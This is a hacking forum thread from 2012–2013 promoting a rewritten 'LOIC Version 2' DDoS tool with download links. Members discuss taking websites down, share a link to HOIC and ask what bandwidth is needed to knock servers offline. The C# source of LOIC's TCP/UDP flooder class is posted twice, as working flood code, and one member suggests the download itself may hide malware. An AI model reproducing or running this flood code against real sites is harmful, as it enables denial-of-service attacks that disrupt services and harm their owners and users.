levy. Posted April 25, 2012 Posted April 25, 2012 LOIC Version 2 is ready! I got the project, and i remake it, translated it to into Visual Basic.Net, Also have updated the skin, and buttons, and 15% more powerful than old. Those are the changes from the Version 1. Preview: Credits: Me Downloads: Sourceforge.net - Mirror Quote
Steven7 Posted April 25, 2012 Posted April 25, 2012 from when dos/ddos tools and hacking shits allowed in forum? :D Quote
icshiba Posted April 25, 2012 Posted April 25, 2012 from when dos/ddos tools and hacking shits allowed in forum? :D That's true and you should post that in vip section anyway. Virus scan ? Quote
levy. Posted April 26, 2012 Author Posted April 26, 2012 That's true and you should post that in vip section anyway. Virus scan ? Update AhnLab-V3 - 20120425 AntiVir - 20120425 Antiy-AVL - 20120425 Avast - 20120426 AVG - 20120426 BitDefender - 20120426 ByteHero - 20120424 CAT-QuickHeal - 20120425 ClamAV HackTool.DDOS.LOIC-2 20120426 Commtouch - 20120426 Comodo - 20120426 DrWeb - 20120426 Emsisoft HackTool.Win32.Oylecann!IK 20120426 eSafe - 20120425 eTrust-Vet - 20120425 F-Prot - 20120425 F-Secure - 20120426 Fortinet - 20120426 GData - 20120426 Ikarus HackTool.Win32.Oylecann 20120426 Jiangmin - 20120425 K7AntiVirus - 20120425 Kaspersky HEUR:HackTool.MSIL.Flooder.gen 20120426 McAfee Artemis!395EB361322D 20120426 McAfee-GW-Edition Artemis!395EB361322D 20120425 Microsoft - 20120426 NOD32 - 20120426 Norman - 20120425 nProtect - 20120425 Panda - 20120425 PCTools - 20120424 Rising - 20120425 Sophos Troj/Loic-A 20120426 SUPERAntiSpyware - 20120402 Symantec - 20120426 TheHacker - 20120425 TrendMicro - 20120425 TrendMicro-HouseCall - 20120426 VBA32 - 20120425 VIPRE - 20120425 ViRobot - 20120425 VirusBuster - 20120425 DDOS Tool, Hacking Tool, LOIC, go to google.com screenshoots to looking at there, LOIC V1, all ppl was downloaded it the same details have shown, it's not a clean virus, it's a ddos tool ^.^ i had builded from my vb.net, also, i am using it too, and as well, i will soon start making the new version of this tool (V3). Go search at google man. You will see ^.^ ! Quote
Destorion Posted April 28, 2012 Posted April 28, 2012 Works 100% Right now i'm testing it and all are perfect without any failure or System Error.... ;) ;) ;) Quote
smek Posted April 28, 2012 Posted April 28, 2012 it is ddos tool???that means that more than one computer must to attack to website to make it down? right? Quote
Steven7 Posted April 28, 2012 Posted April 28, 2012 it is ddos tool???that means that more than one computer must to attack to website to make it down? right? ye and depends on site server :D and this is HOIC http://tinyurl.com/75ju7q8 Quote
Unreachable Posted April 30, 2012 Posted April 30, 2012 In my net i can have UPLOAD more than 100Mbps(Private Network), why with program i get only 15Mbps? Maby program is bad coded? And, what speed i must have to take down servers; MySpeed > ISP Speed? Quote
NwaY Posted December 26, 2013 Posted December 26, 2013 can some1 answer me i'm noob at this but when i donwloaded it , my anti-virus said it is an virus i know the ant-virus always say's that with hacking tools but i'm scarred this is a real virus with a keylogger and his going to steal my personal information. can somebody check it if it contains a keylogger or something? -ps sry for my bad english Quote
Aphelion Posted December 26, 2013 Posted December 26, 2013 (edited) Because simply it's fake, probably he inserted some viruses in it, dunno and I dont care. You can't convert everything from Java/C#/C++ to vb.net. And just to be sure(if a Java/C#/C++, vb.net developer can confirm it), here is the source code of it: using System; using System.ComponentModel; using System.Net; using System.Net.Sockets; using System.Text; namespace LOIC { public class XXPFlooder { public bool IsFlooding; public int FloodCount; public string IP; public int Port; public int Protocol; public int Delay; public bool Resp; public string Data; private bool AllowRandom; public XXPFlooder(string ip, int port, int proto, int delay, bool resp, string data, bool random) { this.IP = ip; this.Port = port; this.Protocol = proto; this.Delay = delay; this.Resp = resp; this.Data = data; this.AllowRandom = random; } public void Start() { IsFlooding = true; BackgroundWorker bw = new BackgroundWorker(); bw.DoWork += new DoWorkEventHandler(bw_DoWork); bw.RunWorkerAsync(); } private void bw_DoWork(object sender, DoWorkEventArgs e) { try { byte[] buf; IPEndPoint RHost = new System.Net.IPEndPoint(System.Net.IPAddress.Parse(IP), Port); while (IsFlooding) { Socket socket = null; if (Protocol == 1) { socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); socket.NoDelay = true; try { socket.Connect(RHost); } catch { continue; } socket.Blocking = Resp; try { while (IsFlooding) { FloodCount++; buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) )); socket.Send(buf); if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1); } } catch { } } if (Protocol == 2) { socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp); socket.Blocking = Resp; try { while (IsFlooding) { FloodCount++; buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) )); socket.SendTo(buf, SocketFlags.None, RHost); if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1); } } catch { } } } } catch { } } } } Edited December 26, 2013 by Aphelion Quote
d2wow Posted December 26, 2013 Posted December 26, 2013 Because simply it's fake, probably he inserted some viruses in it, dunno and I dont care. You can't convert everything from Java/C#/C++ to vb.net. And just to be sure(if a Java/C#/C++, vb.net developer can confirm it), here is the source code of it: using System; using System.ComponentModel; using System.Net; using System.Net.Sockets; using System.Text; namespace LOIC { public class XXPFlooder { public bool IsFlooding; public int FloodCount; public string IP; public int Port; public int Protocol; public int Delay; public bool Resp; public string Data; private bool AllowRandom; public XXPFlooder(string ip, int port, int proto, int delay, bool resp, string data, bool random) { this.IP = ip; this.Port = port; this.Protocol = proto; this.Delay = delay; this.Resp = resp; this.Data = data; this.AllowRandom = random; } public void Start() { IsFlooding = true; BackgroundWorker bw = new BackgroundWorker(); bw.DoWork += new DoWorkEventHandler(bw_DoWork); bw.RunWorkerAsync(); } private void bw_DoWork(object sender, DoWorkEventArgs e) { try { byte[] buf; IPEndPoint RHost = new System.Net.IPEndPoint(System.Net.IPAddress.Parse(IP), Port); while (IsFlooding) { Socket socket = null; if (Protocol == 1) { socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); socket.NoDelay = true; try { socket.Connect(RHost); } catch { continue; } socket.Blocking = Resp; try { while (IsFlooding) { FloodCount++; buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) )); socket.Send(buf); if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1); } } catch { } } if (Protocol == 2) { socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp); socket.Blocking = Resp; try { while (IsFlooding) { FloodCount++; buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) )); socket.SendTo(buf, SocketFlags.None, RHost); if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1); } } catch { } } } } catch { } } } } this isn't java, its C# Few differences using instead of import bool Resp; instead of boolean Resp; string Data; instead of String So since C# is .net language I see it possible to be done. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.